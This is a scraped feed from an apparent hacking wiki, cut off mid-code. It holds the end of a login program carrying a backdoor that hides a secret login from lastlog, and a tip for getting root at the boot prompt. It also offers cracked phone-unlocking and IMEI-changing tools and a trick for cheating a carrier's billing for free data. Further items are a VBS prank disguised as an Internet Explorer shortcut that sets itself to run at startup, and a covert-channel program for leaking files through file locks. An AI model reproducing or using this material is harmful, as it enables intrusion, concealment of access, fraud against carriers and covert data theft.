        while(--cnt &amp;gt;= 0 &amp;amp;&amp;amp; (more = read(fd, p, 1)) == 1 &amp;amp;&amp;amp; *p != &amp;#39;\n&amp;#39;) p++;
        if(more &amp;amp;&amp;amp; *p == &amp;#39;\n&amp;#39;) {
            *p = &amp;#39;\0&amp;#39;;
            if(!strcmp(buf, ttyn)) {
                close(fd);
                return 1;
            }
            else
                continue;
        } else {
            close(fd);
            return 0;
        }
    }
}
#endif

jmp_buf motdinterrupt;

void
motd()
{
    register int fd, nchars;
    void (*oldint)(), sigint();
    char tbuf[8192];

    if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) &amp;lt; 0)
        return;
    oldint = signal(SIGINT, sigint);
    if (setjmp(motdinterrupt) == 0)
        while ((nchars = read(fd, tbuf, sizeof(tbuf))) &amp;gt; 0)
            (void)write(fileno(stdout), tbuf, nchars);
    (void)signal(SIGINT, oldint);
    (void)close(fd);
}

void
sigint()
{
    longjmp(motdinterrupt, 1);
}

void
checknologin()
{
    register int fd, nchars;
    char tbuf[8192];

    if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) &amp;gt;= 0) {
        while ((nchars = read(fd, tbuf, sizeof(tbuf))) &amp;gt; 0)
            (void)write(fileno(stdout), tbuf, nchars);
        sleepexit(0);
    }
}

void
dolastlog(quiet)
    int quiet;
{
    struct lastlog ll;
    int fd;

    if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) &amp;gt;= 0) {
        (void)lseek(fd, (off_t)pwd-&amp;gt;pw_uid * sizeof(ll), L_SET);
        if (!quiet) {
            if (read(fd, (char *)&amp;amp;ll, sizeof(ll)) == sizeof(ll) &amp;amp;&amp;amp;
                ll.ll_time != 0) {
                (void)printf(&amp;quot;Last login: %.*s &amp;quot;,
                    24-5, (char *)ctime(&amp;amp;ll.ll_time));
                if (*ll.ll_host != &amp;#39;\0&amp;#39;)
                    printf(&amp;quot;from %.*s\n&amp;quot;,
                        (int)sizeof(ll.ll_host), ll.ll_host);
                else
                    printf(&amp;quot;on %.*s\n&amp;quot;,
                        (int)sizeof(ll.ll_line), ll.ll_line);
            }
            /* back to the user&amp;#39;s slot, the read above advanced the offset */
            (void)lseek(fd, (off_t)pwd-&amp;gt;pw_uid * sizeof(ll), L_SET);
        }
        memset((char *)&amp;amp;ll, 0, sizeof(ll));
        (void)time(&amp;amp;ll.ll_time);
        strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
        if (hostname)
            strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
        /* backdoor: a krad login leaves the user&amp;#39;s lastlog slot untouched */
        if(krad == 0)
            (void)write(fd, (char *)&amp;amp;ll, sizeof(ll));
        (void)close(fd);
    }
}

void
badlogin(name)
    char *name;
{
    if (failures == 0)
        return;
    if (hostname)
        syslog(LOG_NOTICE, &amp;quot;%d LOGIN FAILURE%s FROM %s, %s&amp;quot;,
            failures, failures &amp;gt; 1 ? &amp;quot;S&amp;quot; : &amp;quot;&amp;quot;, hostname, name);
    else
        syslog(LOG_NOTICE, &amp;quot;%d LOGIN FAILURE%s ON %s, %s&amp;quot;,
            failures, failures &amp;gt; 1 ? &amp;quot;S&amp;quot; : &amp;quot;&amp;quot;, tty, name);
}

#undef  UNKNOWN
#define UNKNOWN &amp;quot;su&amp;quot;

#ifndef linux
char *
stypeof(ttyid)
    char *ttyid;
{
    struct ttyent *t;

    return(ttyid &amp;amp;&amp;amp; (t = getttynam(ttyid)) ? t-&amp;gt;ty_type : UNKNOWN);
}
#endif

void
checktty(user, tty)
    char *user;
    char *tty;
{
    FILE *f;
    char buf[256];
    char *ptr;
    char devname[50];
    struct stat stb;

    /* no /etc/usertty, default to allow access */
    if(!(f = fopen(_PATH_USERTTY, &amp;quot;r&amp;quot;))) return;

    while(fgets(buf, 255, f)) {
        /* strip comments */
        for(ptr = buf; ptr &amp;lt; buf + 256; ptr++)
            if(*ptr == &amp;#39;#&amp;#39;) *ptr = 0;

        strtok(buf, &amp;quot; \t&amp;quot;);
        if(strncmp(user, buf, 8) == 0) {
            while((ptr = strtok(NULL, &amp;quot;\t\n &amp;quot;))) {
                if(strncmp(tty, ptr, 10) == 0) {
                    fclose(f);
                    return;
                }
                if(strcmp(&amp;quot;PTY&amp;quot;, ptr) == 0) {
#ifdef linux
                    /* stat the tty we are logging in on, not the literal word PTY */
                    sprintf(devname, &amp;quot;/dev/%s&amp;quot;, tty);
                    /* VERY linux dependent, recognize PTY as alias
                       for all pseudo tty&amp;#39;s */
                    if((stat(devname, &amp;amp;stb) &amp;gt;= 0)
                       &amp;amp;&amp;amp; major(stb.st_rdev) == 4
                       &amp;amp;&amp;amp; minor(stb.st_rdev) &amp;gt;= 192) {
                        fclose(f);
                        return;
                    }
#endif
                }
            }
            /* if we get here, /etc/usertty exists, there&amp;#39;s a line beginning
               with our username, but it doesn&amp;#39;t contain
the name of the tty where the user is trying to log in. So deny access! */ fclose(f); printf(&amp;quot;Login on %s denied.\n&amp;quot;, tty); badlogin(user); sleepexit(1); } }   fclose(f); /* users not mentioned in /etc/usertty are by default allowed access on all tty&amp;#39;s */ } void getstr(buf, cnt, err) char *buf, *err; int cnt; { char ch; do { if (read(0, &amp;amp;ch, sizeof(ch)) != sizeof(ch)) exit(1); if (--cnt &amp;lt; 0) { (void)fprintf(stderr, &amp;quot;%s too long\r\n&amp;quot;, err); sleepexit(1); } *buf++ = ch; } while (ch); } void sleepexit(eval) int eval; { sleep((unsigned int)5); exit(eval); }  So if you really wanna have root access and have access to console, reboot it (carefully, do a ctrl-alt-del) and at lilo prompt do a : init=/bin/bash rw (for linux 2.0.0 and above (I think)). Don&amp;#39;t wonder why I was speaking only about rootshell and dhp.com, there are lots of other very good hacking pages, but these ones are updated very quickly and besides, are the best pages I know. So folks, this was it... First version of my USER&amp;#39;s GUIDE 1.0. Maybe I&amp;#39;ll do better next time, and if I have more time, I&amp;#39;ll add about 50(more) other exploits, remote ones, new stuff, new techniques, etc... See ya, folks ! GOOD NIGHT !!! (it&amp;#39;s 6.am now). DAMN !!! ARGHHH! I forgot... My e-mail adress is &amp;lt;phantom@XXXXXXXYOUWISHXXXXXXXX&amp;gt;. (for now).   
&lt;/div&gt;&lt;/div&gt;&lt;hr size=&quot;1&quot;&gt;&lt;br/&gt;</description></item><item><title>Secret CD of Mobile Unlocking(BlackBerry Unlocking Software) and Repairing By crack0hack</title><link>http://crack0hack.wetpaint.com/page/Secret+CD+of+Mobile+Unlocking%28BlackBerry+Unlocking+Software%29+and+Repairing+By+crack0hack</link><author>punkey8oy</author><guid isPermaLink="false">http://crack0hack.wetpaint.com/page/Secret+CD+of+Mobile+Unlocking%28BlackBerry+Unlocking+Software%29+and+Repairing+By+crack0hack</guid><pubDate>Fri, 25 Jul 2008 03:12:11 CDT</pubDate><description>&lt;font face=&quot;Courier&quot; size=&quot;4&quot;&gt;You can earn thousands from mobile repairing and unlocking.&lt;br&gt;&lt;br&gt;The CD includes the following software:&lt;br&gt;&lt;br&gt; EricsClient730gsm&lt;br&gt; Alcatel_unlockerv45&lt;br&gt; All Samsung Unlocker v1.30.exe&lt;br&gt; All_Siemens.exe&lt;br&gt; CruxCalc_v5_Setup.exe&lt;br&gt; DCT4 Calculator 1.4..#.exe&lt;br&gt; DCT4 Calculator 1.4.exe&lt;br&gt; Panasonic GD55 Unlocking Tool.exe&lt;br&gt; SmartDCT4CalcV201_setup.exe&lt;br&gt; Unlocking Phone BlackID&amp;trade;.exe&lt;br&gt; UNLOCK c450 c550 c650 v80 v220 e380&lt;br&gt; Mobile Phone Unlocker and Repair Tools&lt;br&gt; Nokia-Samsung- Unlock&lt;br&gt; Panasonic GD92-93 Unlocker v1.0 By Wolfgang&lt;br&gt; Panasonic GD93 Unlocker v1.0 by Ghost3D&lt;br&gt; Panasonic_gd-67-97_unlocker&lt;br&gt; Samsung A800 Unlocker by Spunlock&lt;br&gt; Sharp GX10 Unlocker&lt;br&gt; Sharp GX10 Unlocker by UnlocKing&lt;br&gt; Siemans A50 unlocker&lt;br&gt; Siemens A35 - A40 All Unlocker&lt;br&gt; freia_v18_cracked.exe&lt;br&gt; SamsungSGH-Q1xxQ2xxServiceToolsVer1.00.EXE&lt;br&gt; Samsung_Unlocker_20.exe&lt;br&gt; Samsung A800 Unlock Imei Changer.exe&lt;br&gt; kNok-Phoenix2100_support&lt;br&gt; SmartDCT4CalcV201_setup.exe&lt;br&gt; k750flasher_13.7.exe&lt;br&gt; NokTest.exe&lt;br&gt; Panasonic_gd-67-97_unlocker&lt;br&gt; mobile phone tool 2.16 update&lt;br&gt; All Samsung Unlocker v1.30.exe&lt;br&gt; NokiaFREE_v310_Nokia_unlock_codes_calculator&lt;br&gt;&lt;br&gt; sim_scan&lt;br&gt; All Nokia Unlocker 5.7.exe&lt;br&gt;&lt;br&gt; and all BlackBerry:&lt;br&gt;&lt;br&gt; Ericsson_Unlock_Software&lt;br&gt; EricsClient730gsm.exe&lt;br&gt; CDMA Sony Ericsson AllEricssonTotalTool&lt;br&gt; SonyEricsson Logger 2.11&lt;br&gt; Ericsson.Tool.v17.by.Saras-RADiANCE&lt;br&gt; Main Flash&lt;br&gt; FileManager_2.5.9.0b.exe&lt;br&gt; LANGINFOGSM.EXE&lt;br&gt; ericson&lt;br&gt; windct&lt;br&gt; dct3&lt;br&gt; dct4&lt;br&gt; nokia&lt;br&gt; phoenix&lt;br&gt; GSM PINOUT DIAGRAM&lt;br&gt; ALL UNLOCKING SOFTWARE FOR NOKIA, SONY ERICSSON, BLACKBERRY, SAMSUNG, SIEMENS ETC.&lt;br&gt;&lt;br&gt; It also includes circuit diagrams for various mobiles, showing which slots they use, and schematics for repairing them.&lt;br&gt;&lt;br&gt; It is very difficult to describe each tool; the CD contains 1686 files in 241 folders.&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Download Now!!!&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59864269/secret_of_mobile_unlocking_and_repairing_cd.part01.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59864269/secret_of_mobile_unlocking_and_repairing_cd.part01.rar&lt;/a&gt; &lt;br&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59867862/secret_of_mobile_unlocking_and_repairing_cd.part02.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59867862/secret_of_mobile_unlocking_and_repairing_cd.part02.rar&lt;/a&gt; &lt;br&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59871253/secret_of_mobile_unlocking_and_repairing_cd.part03.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59871253/secret_of_mobile_unlocking_and_repairing_cd.part03.rar&lt;/a&gt; &lt;br&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59874648/secret_of_mobile_unlocking_and_repairing_cd.part04.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59874648/secret_of_mobile_unlocking_and_repairing_cd.part04.rar&lt;/a&gt; &lt;br&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59877853/secret_of_mobile_unlocking_and_repairing_cd.part05.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59877853/secret_of_mobile_unlocking_and_repairing_cd.part05.rar&lt;/a&gt; &lt;br&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59881235/secret_of_mobile_unlocking_and_repairing_cd.part06.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59881235/secret_of_mobile_unlocking_and_repairing_cd.part06.rar&lt;/a&gt;&lt;br&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59884399/secret_of_mobile_unlocking_and_repairing_cd.part07.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59884399/secret_of_mobile_unlocking_and_repairing_cd.part07.rar&lt;/a&gt;&lt;br&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59860520/secret_of_mobile_unlocking_and_repairing_cd.part08.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59860520/secret_of_mobile_unlocking_and_repairing_cd.part08.rar&lt;/a&gt; &lt;br&gt;&lt;a class=&quot;external&quot; href=&quot;http://rapidshare.com/files/59860809/secret_of_mobile_unlocking_and_repairing_cd.part09.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/59860809/secret_of_mobile_unlocking_and_repairing_cd.part09.rar&lt;/a&gt;&lt;hr size=&quot;1&quot;&gt;&lt;br/&gt;</description></item><item><title>Idea Hack for Free 
GPRS</title><link>http://crack0hack.wetpaint.com/page/Idea+Hack+for+Free+GPRS</link><author>punkey8oy</author><guid isPermaLink="false">http://crack0hack.wetpaint.com/page/Idea+Hack+for+Free+GPRS</guid><comments>Rename</comments><pubDate>Fri, 25 Jul 2008 03:09:08 CDT</pubDate><description>&lt;font face=&quot;Times&quot;&gt;This is a new trick for users of Idea Cellular, on a cell phone or a PC/laptop.&lt;br&gt;&lt;br&gt;Before starting the detailed procedure, note the following:&lt;br&gt;&lt;br&gt;#1... YOU MUST NOT HAVE AN ACTIVE CONNECTION!&lt;br&gt;#2... YOU MUST NOT HAVE ANY ACTIVE GPRS/INTERNET PLAN!&lt;br&gt;#3... YOU MUST HAVE A PREPAID CONNECTION! (USING THIS TRICK ON POSTPAID WILL ONLY GET YOU A HIGHER BILL.)&lt;br&gt;#4... YOU MUST USE AN S60 DEVICE OR HIGHER. DO NOT USE THIS TRICK ON S40 DEVICES (IT WORKS ON ONLY SOME OF THEM).&lt;br&gt;#5... THIS TRICK HAS BEEN TESTED SUCCESSFULLY ON NOKIA AND SONY ERICSSON DEVICES.&lt;br&gt;&lt;br&gt;NOW THE PROCEDURE FOR FREE INTERNET:&lt;br&gt;&lt;br&gt;From your Idea cell phone, type GP13 and send it to 4444.&lt;br&gt;You will receive a message that your GP13 pack will be activated within 24 hours.&lt;br&gt;Wait 12 to 16 hours, then send the same SMS to 4444 again.&lt;br&gt;You will receive a message that your request has already been registered.&lt;br&gt;After another 24 hours you will find that your GP13 pack has been activated.&lt;br&gt;&lt;br&gt;BUT that is not the trick, because you have now been charged Rs 13 for activating GP13. The real trick starts now.&lt;br&gt;&lt;br&gt;After the GP13 pack has been activated, send NOGP13 to 4444 (messages to 4444 are free of charge).&lt;br&gt;You will receive a message that your GP13 pack will be deactivated within 24 hours.&lt;br&gt;Just 10 to 12 hours after sending the deactivation SMS, send GP13 to 4444 again.&lt;br&gt;&lt;br&gt;That is all; the steps for free internet are complete. The claim is that an activation request arriving while the deactivation is still pending confuses the billing system, which is then unable to decide what to do.&lt;br&gt;&lt;br&gt;Some time after sending that last activation SMS, reboot your phone (from the file explorer, or just restart the device); you should then be able to surf for free.&lt;br&gt;&lt;br&gt;Note: on a cell phone use Opera Mini or the UC Web browser; on a PC/laptop use the Smart Web browser or Opera 9.27.&lt;br&gt;&lt;br&gt;If you want to use a proxy with Opera, use one of the proxies below (port 1080 for all of them):&lt;br&gt;&lt;br&gt;1. IP address: 12.148.192.178, port 1080&lt;br&gt;2. IP address: 63.127.192.178&lt;br&gt;3. IP address: 199.105.112.152&lt;br&gt;4. IP address: 199.105.112.163&lt;br&gt;5. IP address: 12.148.162.37&lt;/font&gt;&lt;hr size=&quot;1&quot;&gt;&lt;br/&gt;</description></item><item><title>Cd drive hack</title><link>http://crack0hack.wetpaint.com/page/Cd+drive+hack</link><author>punkey8oy</author><guid isPermaLink="false">http://crack0hack.wetpaint.com/page/Cd+drive+hack</guid><pubDate>Fri, 25 Jul 2008 03:04:36 CDT</pubDate><description>&lt;font face=&quot;Times&quot;&gt;Here jai147 will show you a basic VBS script that opens the CD drive every time it is found closed, so the tray keeps popping out until the script is stopped. Copy and paste this code into Notepad (any plain ANSI text editor) and save it as CDfun.vbs; don&amp;#39;t forget the .vbs extension.&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;#39; drive the CD trays through the Windows Media Player ActiveX control&lt;br&gt;set wmp = createObject(&amp;quot;wmplayer.ocx.7&amp;quot;)&lt;br&gt;set drives = wmp.cdromCollection&lt;br&gt;&lt;br&gt;sub open_saysame()&lt;br&gt;on error resume next&lt;br&gt;&amp;#39; endless loop with no delay: keeps ejecting every drive and pins a CPU core&lt;br&gt;do&lt;br&gt;if drives.count &amp;gt;= 1 then&lt;br&gt;for i = 0 to drives.count - 1&lt;br&gt;drives.item(i).eject()&lt;br&gt;next&lt;br&gt;end if&lt;br&gt;loop&lt;br&gt;end sub&lt;br&gt;&lt;br&gt;open_saysame()&lt;br&gt;&lt;br&gt;&lt;br&gt;This is funny, but it gets funnier if it loads every time the computer starts. Open a new blank Notepad document and put these two lines in it:&lt;br&gt;&lt;br&gt;copy CDfun.vbs &amp;quot;c:\Documents and Settings\%username%\Start Menu\Programs\Startup\&amp;quot;&lt;br&gt;CDfun.vbs&lt;br&gt;&lt;br&gt;Save this as run.bat in the same folder as CDfun.vbs (the copy command uses a relative path, so the two files must sit together). Now comes the fun part: you need to get them to open run.bat somehow. There are many ways; one is to make a shortcut to it called &amp;quot;Internet Explorer&amp;quot; and right-click it to change the icon in its properties;
that way it will look just like Internet Explorer.&lt;br&gt;&lt;br&gt;&lt;/font&gt;How to stop this thing?&lt;br&gt;Open Task Manager &amp;gt; Processes &amp;gt; wscript.exe, right-click it and choose End Process Tree; then delete CDfun.vbs from the Startup folder, or it will run again at the next logon.&lt;br&gt;&lt;br&gt;Done.&lt;br&gt;&lt;br&gt;Cheers.&lt;br&gt;&lt;hr size=&quot;1&quot;&gt;&lt;br/&gt;</description></item><item><title>Stenoghrapied file copy using posix file locks</title><link>http://crack0hack.wetpaint.com/page/Stenoghrapied+file+copy+using+posix+file+locks</link><author>punkey8oy</author><guid isPermaLink="false">http://crack0hack.wetpaint.com/page/Stenoghrapied+file+copy+using+posix+file+locks</guid><pubDate>Fri, 25 Jul 2008 02:58:49 CDT</pubDate><description>&lt;font face=&quot;Times&quot;&gt;I wish to share one of the working examples; the article and example below are sourced from&lt;br&gt;&lt;br&gt;&lt;br&gt;//www.networkpenetration.com&lt;br&gt;//File Trickery - Stenoghrapied file copy using posix file locks.&lt;br&gt;//Ste Jones root@networkpenetration.com&lt;br&gt;//&lt;br&gt;//compile: gcc filetrickery.c -Wall -o filetrickery&lt;br&gt;//&lt;br&gt;//Tested on Linux Mandrake 8.0&lt;br&gt;//Tested over NFS between two mandrake 8 machines&lt;br&gt;//&lt;br&gt;//To Do&lt;br&gt;//-----&lt;br&gt;//1. spoof args&lt;br&gt;//2. remove trailing 0&amp;#39;s by sending size at start of transfer&lt;br&gt;//3. randomize order&lt;br&gt;//4. 
add spoofed locks&lt;br&gt;&lt;br&gt;&lt;br&gt;#include &amp;lt;stdio.h&amp;gt;&lt;br&gt;#include &amp;lt;stdlib.h&amp;gt;&lt;br&gt;#include &amp;lt;unistd.h&amp;gt;&lt;br&gt;#include &amp;lt;errno.h&amp;gt;&lt;br&gt;#include &amp;lt;string.h&amp;gt;&lt;br&gt;#include &amp;lt;sys/types.h&amp;gt;&lt;br&gt;#include &amp;lt;sys/stat.h&amp;gt;&lt;br&gt;#include &amp;lt;sys/file.h&amp;gt;&lt;br&gt;#include &amp;lt;fcntl.h&amp;gt;&lt;br&gt;#include &amp;lt;curses.h&amp;gt;&lt;br&gt;#include &amp;lt;time.h&amp;gt;&lt;br&gt;&lt;br&gt;#define VER &amp;quot;0.91&amp;quot;&lt;br&gt;&lt;br&gt;#define TIMEOUT 3 //after timeout save and close the obtained file&lt;br&gt;#define INITTIMEOUT 30 //time for client to wait for server to start&lt;br&gt;#define SLEEP 1 //used to lower CPU usage&lt;br&gt;#define VERBOSE 1//0: less info displayed, 1: loads of info displayed, 2: debug mode&lt;br&gt;&lt;br&gt;static struct flock lockit, unlockit, wrlockit;&lt;br&gt;int makefile(void);&lt;br&gt;void how2use(char *progname);&lt;br&gt;void server(void);&lt;br&gt;void client(void);&lt;br&gt;int openfile(void);&lt;br&gt;int filesize(void);&lt;br&gt;void displaybits(char );&lt;br&gt;struct fname{&lt;br&gt; char *files;&lt;br&gt;};&lt;br&gt;&lt;br&gt;struct files {&lt;br&gt; char *sync1;&lt;br&gt; char *sync2;&lt;br&gt; struct fname fn[32];&lt;br&gt;};&lt;br&gt;&lt;br&gt;char *sfile;&lt;br&gt;char *cfile;&lt;br&gt;&lt;br&gt;struct files f[1]; //ugh why does 0 not work?&lt;br&gt;int main(int argc, char *argv[])&lt;br&gt;{&lt;br&gt; int c;&lt;br&gt; &lt;br&gt; sfile = NULL;&lt;br&gt; cfile = NULL;&lt;br&gt; &lt;br&gt; lockit.l_type = F_RDLCK;&lt;br&gt; lockit.l_whence = SEEK_SET;&lt;br&gt; lockit.l_start = 0;&lt;br&gt; lockit.l_len = 0;&lt;br&gt;&lt;br&gt; unlockit.l_type = F_UNLCK;&lt;br&gt; unlockit.l_whence = SEEK_SET;&lt;br&gt; unlockit.l_start = 0;&lt;br&gt; unlockit.l_len = 0;&lt;br&gt; &lt;br&gt; wrlockit.l_type = F_WRLCK;&lt;br&gt; wrlockit.l_whence = SEEK_SET;&lt;br&gt; wrlockit.l_start = 
0;&lt;br&gt; wrlockit.l_len = 0;&lt;br&gt;  &lt;br&gt; printf(&amp;quot;\nFile Trickery &amp;quot; VER &amp;quot; from www.networkpenetration.com\n&amp;quot;);&lt;br&gt; printf(&amp;quot;--------------------------------------------------\n&amp;quot;);&lt;br&gt; opterr = 0;&lt;br&gt; &lt;br&gt; while ((c = getopt(argc, argv, &amp;quot;c:s:&amp;quot;)) != -1){&lt;br&gt;  switch(c){&lt;br&gt;   case &amp;#39;c&amp;#39;: cfile = optarg;&lt;br&gt;     break;&lt;br&gt;  &lt;br&gt;   case &amp;#39;s&amp;#39;: sfile = optarg;&lt;br&gt;     break;&lt;br&gt;&lt;br&gt;   default: how2use(argv[0]);&lt;br&gt;    break;&lt;br&gt;  }&lt;br&gt; }&lt;br&gt; if (sfile &amp;amp;&amp;amp; cfile) {&lt;br&gt;  printf(&amp;quot;Select either (c)lient or (s)erver from the command line\n&amp;quot;);&lt;br&gt;  exit(1);&lt;br&gt; }&lt;br&gt; &lt;br&gt; if(argc != 37){&lt;br&gt;  how2use(argv[0]);&lt;br&gt;  exit(1);&lt;br&gt; }&lt;br&gt; &lt;br&gt; f-&amp;gt;sync1 = argv[3];&lt;br&gt; f-&amp;gt;sync2 = argv[4];&lt;br&gt; c = 0;&lt;br&gt; for(c=0; c&amp;lt;32; c++){&lt;br&gt;  f-&amp;gt;fn[c].files = argv[c+5];&lt;br&gt; }&lt;br&gt; if (cfile) {&lt;br&gt;  printf(&amp;quot;starting client\n&amp;quot;);&lt;br&gt;  client();&lt;br&gt;  exit(1);&lt;br&gt; }&lt;br&gt; &lt;br&gt; if (sfile) {&lt;br&gt;  printf(&amp;quot;starting server\n&amp;quot;);&lt;br&gt;  server();&lt;br&gt;  exit(1);&lt;br&gt; }&lt;br&gt; &lt;br&gt; exit(1);&lt;br&gt;}&lt;br&gt;&lt;br&gt;//(set values, flagA1, check flagB1, set values, flagA0, check flagB0)....&lt;br&gt;void server(void)&lt;br&gt;{&lt;br&gt; unsigned char buf[1]; /* holds the single byte fread() fetches per pass; a zero-length array here would be overrun */&lt;br&gt; FILE *fd;&lt;br&gt; register int bytecount, bitcount, lockcount, filecount, p,q;&lt;br&gt; int lockfd[32];&lt;br&gt; size_t count;&lt;br&gt; int syncfd1;&lt;br&gt; register int syncfd2;&lt;br&gt; struct flock test;&lt;br&gt; register int lock;&lt;br&gt; int fsize;&lt;br&gt; &lt;br&gt;&lt;br&gt; fsize = filesize();&lt;br&gt; printf(&amp;quot;Leaking: %s Size: %d bytes\n&amp;quot;, sfile, 
fsize);&lt;br&gt; &lt;br&gt; fd = fopen(sfile, &amp;quot;r&amp;quot;);&lt;br&gt; if (!fd){&lt;br&gt;  printf(&amp;quot;Doh.... %s can&amp;#39;t be opened\n&amp;quot;, sfile);&lt;br&gt;  exit(1);&lt;br&gt; }&lt;br&gt; bytecount = 0;&lt;br&gt; memset(lockfd, &amp;#39;\0&amp;#39;, sizeof(lockfd));&lt;br&gt; count = 1;&lt;br&gt; lock = 0; //alternate 0 1 for each pass to ensure sync&lt;br&gt; &lt;br&gt; while (count !=0){&lt;br&gt;  if(!lock) lock = 1; //lock starts on 1&lt;br&gt;  else lock = 0;&lt;br&gt;  &lt;br&gt;  filecount = 0;&lt;br&gt;  lockcount = 0;&lt;br&gt;  &lt;br&gt;  for(q=0; q&amp;lt;4 || count == 0; q++){&lt;br&gt;   memset(buf, &amp;#39;\0&amp;#39;, sizeof(buf));&lt;br&gt;   count = fread(buf, 1, 1,fd);&lt;br&gt;   if (count == 0) {&lt;br&gt;    if(ferror(fd) !=0){&lt;br&gt;     printf(&amp;quot;File Error\n&amp;quot;);&lt;br&gt;     exit(0);&lt;br&gt;    }&lt;br&gt;    if(feof(fd) !=0){&lt;br&gt;     count = 0;&lt;br&gt;     break;&lt;br&gt;    }&lt;br&gt;   }&lt;br&gt;&lt;br&gt;    for(bitcount=1; bitcount&amp;lt;=128; bitcount=bitcount*2){&lt;br&gt;    if (bitcount &amp;amp;buf[0]){&lt;br&gt;     if(VERBOSE) printf(&amp;quot;byte %d bit:%d 1 &amp;quot;,bytecount,bitcount);&lt;br&gt;     if((lockfd[lockcount] = open(f-&amp;gt;fn[filecount].files, O_WRONLY)) == -1) {&lt;br&gt;      printf(&amp;quot;\nDoh.... %s can&amp;#39;t be opened as %s\n&amp;quot;, f-&amp;gt;fn[filecount].files, strerror(errno));&lt;br&gt;      exit(1);&lt;br&gt;     }&lt;br&gt; &lt;br&gt;     if(fcntl(lockfd[lockcount], F_SETLK, &amp;amp;wrlockit) == -1){&lt;br&gt;      printf(&amp;quot;\nDoh.... 
Lock can&amp;#39;t be set on %s as %s\n&amp;quot;, f-&amp;gt;fn[filecount].files, strerror(errno));&lt;br&gt;      exit(1);&lt;br&gt;     }&lt;br&gt;     else {&lt;br&gt;      if(VERBOSE) printf(&amp;quot;locked file %s\n&amp;quot;, f-&amp;gt;fn[filecount].files);&lt;br&gt;     }&lt;br&gt;     lockcount++;&lt;br&gt;    } &lt;br&gt;    else {&lt;br&gt;     if(VERBOSE) printf(&amp;quot;byte %d bit:%d 0\n&amp;quot;,bytecount,bitcount);&lt;br&gt;    }&lt;br&gt;    filecount++;&lt;br&gt;   }&lt;br&gt; bytecount++;&lt;br&gt;  }   &lt;br&gt;    &lt;br&gt;&lt;br&gt;  if(lock) {&lt;br&gt;   if((syncfd1 = open(f-&amp;gt;sync1, O_WRONLY)) == -1) {&lt;br&gt;    printf(&amp;quot;\nDoh.... %s can&amp;#39;t be opened as %s\n&amp;quot;, f-&amp;gt;sync1, strerror(errno));&lt;br&gt;    exit(1);&lt;br&gt;   }&lt;br&gt;   if(fcntl(syncfd1, F_SETLK, &amp;amp;wrlockit) == -1){&lt;br&gt;    printf(&amp;quot;\nDoh.... Lock can&amp;#39;t be set on %s as %s\n&amp;quot;, f-&amp;gt;sync1, strerror(errno));&lt;br&gt;    exit(1);&lt;br&gt;   }&lt;br&gt;  &lt;br&gt;   else {&lt;br&gt;    printf(&amp;quot;locked %s.... waiting for client to read\n&amp;quot;, f-&amp;gt;sync1);&lt;br&gt;    goto checkit;&lt;br&gt;   }&lt;br&gt;  }&lt;br&gt;&lt;br&gt;  if(!lock){&lt;br&gt;   if(fcntl(syncfd1, F_SETLK, &amp;amp;unlockit) == -1){&lt;br&gt;    printf(&amp;quot;\nDoh.... Cant unlock %s as %s\n&amp;quot;, f-&amp;gt;sync1, strerror(errno));&lt;br&gt;    exit(1);&lt;br&gt;   }&lt;br&gt;   else {&lt;br&gt;    printf(&amp;quot;unlocked %s.... waiting for client to read\n&amp;quot;, f-&amp;gt;sync1);&lt;br&gt;    if(close(syncfd1) == -1){&lt;br&gt;     printf(&amp;quot;Doh.... close error on %s as %s\n&amp;quot;, f-&amp;gt;sync1, strerror(errno));&lt;br&gt;     exit(1);&lt;br&gt;    }&lt;br&gt;    goto checkit;&lt;br&gt;   }&lt;br&gt;  }&lt;br&gt;   &lt;br&gt;  checkit:&lt;br&gt;   if((syncfd2 = open(f-&amp;gt;sync2, O_RDONLY)) == -1) {&lt;br&gt;    printf(&amp;quot;\nDoh.... 
